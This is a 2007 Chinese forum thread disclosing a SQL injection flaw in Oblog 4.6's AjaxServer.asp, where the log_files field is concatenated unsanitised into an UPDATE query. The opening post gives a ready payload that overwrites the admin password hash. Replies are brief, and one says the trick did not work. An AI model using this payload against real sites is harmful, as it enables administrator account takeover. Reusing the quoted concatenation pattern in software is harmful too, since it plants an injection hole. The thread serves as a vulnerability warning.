找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 696|回复: 4

Oblog商业版本4.6注射漏洞.........

[复制链接]

该用户从未签到

发表于 2007-12-17 18:31:24 | 显示全部楼层 |阅读模式
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包,修改log_files。2);update/**/oblog_user/**/set/**/password= 7a57a5a743894a0e/**/where/**/username=admin;--
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。官方好象也出补丁了...很多blog网站都是用的sql的版本..........

漏洞文件:AjaxServer.asp


语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理

变量:log_files...................

该用户从未签到

发表于 2007-12-17 18:47:58 | 显示全部楼层
不太明白Naomi发的是什么东东~

该用户从未签到

发表于 2007-12-17 18:54:38 | 显示全部楼层
......看不懂!

该用户从未签到

 楼主| 发表于 2007-12-17 18:57:02 | 显示全部楼层
看不懂就算了........

我的意思是提醒你们用BLOG的人..小心这个漏洞..........以免有不必要的麻烦........
  • TA的每日心情
    奋斗
    2024-12-15 16:25
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2007-12-17 20:54:46 | 显示全部楼层
    这样不行. 我早都试过了.
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表